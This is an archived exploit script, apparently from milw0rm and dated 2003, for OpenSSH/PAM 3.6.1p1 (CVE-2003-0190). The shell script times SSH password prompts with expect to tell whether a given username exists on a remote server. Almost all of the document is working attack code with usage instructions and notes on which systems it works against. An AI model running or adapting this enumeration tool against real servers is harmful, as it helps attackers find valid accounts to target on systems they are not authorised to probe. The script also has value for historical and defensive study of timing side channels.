OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident - CVE-2003-0190

1. #!/bin/sh
2. # OpenSSH <= 3.6.p1 - User Identification.
3. # Nicolas Couture - nc@stormvault.net
4. #
5. # Description:
6. #   -Tells you wether or not a user exist on
7. #     a distant server running OpenSSH.
8. #
9. # Usage:
10. #   -You NEED to have the host's public key
11. #     before executing this script.
12. #
13.  
14. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
15. # Fact Sheet:                    #
16. #     o It is really accurate against    #
17. #       redhat boxes.            #
18. #     o Linux boxes running grsecurity   #
19. #       has 10 seconds delay on both     #
20. #       valid AND invalid user login     #
21. #       attempts.                #
22. #     o *BSD boxes are not vulnerables and   #
23. #        always has 10 seconds delay like    #
24. #        Linux-Grsec + network protection    #
25. #                        #
26. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
27.  
28. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
29. # History:               
30. #    Thu May  1 15:41:18 EDT 2003  
31. #     ; Script started.    
32. #    Thu May  1 16:42:30 EDT 2003  
33. #     ; Script is functional.                
34. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
35.  
36. # Let the user know how we work.
37. usage(){
38.  echo "$0 <user> <host>"
39.  exit 1
40. }
41.  
42. # Verify the arguments.
43. [ $# != 2 ] && usage
44.  
45. # Variables.
46. USER="$1"
47. HOST="$2"
48.  
49. #=-=-=-=-=-=-=-=-=-=-=-=-=#
50. # Expect script functions         #
51. #=-=-=-=-=-=-=-=-=-=-=-=-=#
52.  
53. # Expect script for password.
54. expasswd() {
55. cat << EOF > expasswd
56. spawn $SSHCMD
57. expect password:
58. send '\r'
59. interact
60. EOF
61. }
62.  
63. # Expect script for error.
64. experror() {
65. cat << EOF > experror
66. spawn expect -f expasswd
67. expect again.
68. exit 1593
69. interact
70. EOF
71. }
72.  
73. #=-=-=-=-=-=-=-=-=-=#
74. # -Fake user timing      #
75. #=-=-=-=-=-=-=-=-=-=#
76.  
77. # OpenSSH client command for inexisting user.
78. export SSHCMD="ssh nicolas_couture@$HOST"
79.  
80. # Build new expect script.
81. expasswd
82. experror
83.  
84. # Timing.
85. FDATE0=`date '+%s'`
86. echo "[-] Calculating fake user timeout..."
87. expect -f experror 1> /dev/null 2> /dev/null
88. FDATE1=`date '+%s'`
89.  
90. # Fake user timeout.
91. FUTO=`echo $FDATE1 - $FDATE0 | bc`
92. echo "[+] Found $FUTO."
93.  
94. #=-=-=-=-=-=-=-=#
95. # -$USER timing    #
96. #=-=-=-=-=-=-=-=#
97.  
98. # OpenSSH command.
99. export SSHCMD="ssh $USER@$HOST"
100.  
101. # Build new expect scripts.
102. expasswd
103. experror
104.  
105. DATE0=`date '+%s'`
106. echo "[-] Calculating $USER timeout on $SERVER..."
107. expect -f experror 1> /dev/null 2> /dev/null
108. DATE1=`date '+%s'`
109.  
110. # $USER timeout.
111. END=`echo $DATE1 - $DATE0 | bc`
112. echo "[+] Found $END."
113.  
114. #=-=-=-=-=#
115. # -Result    #
116. #=-=-=-=-=#
117.  
118. if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
119.  echo "This box is not vulnerable."
120.  exit 1
121. fi
122.  
123. # Use of our magic skills.
124. if [ "$FUTO" -lt "$END" ]; then
125.  echo "$USER exist on $HOST."
126. elif [ "$FUTO" -ge "$END" ]; then
127.  echo "$USER doesn't exist on $HOST."
128. else
129.  echo "Segmentation fault."
130.  exit 13
131. fi
132.  
133. # Remove tmp files.
134. rm -rf expasswd experror
135.  
136. # EOF
137.  
138. # milw0rm.com [2003-05-02]
139.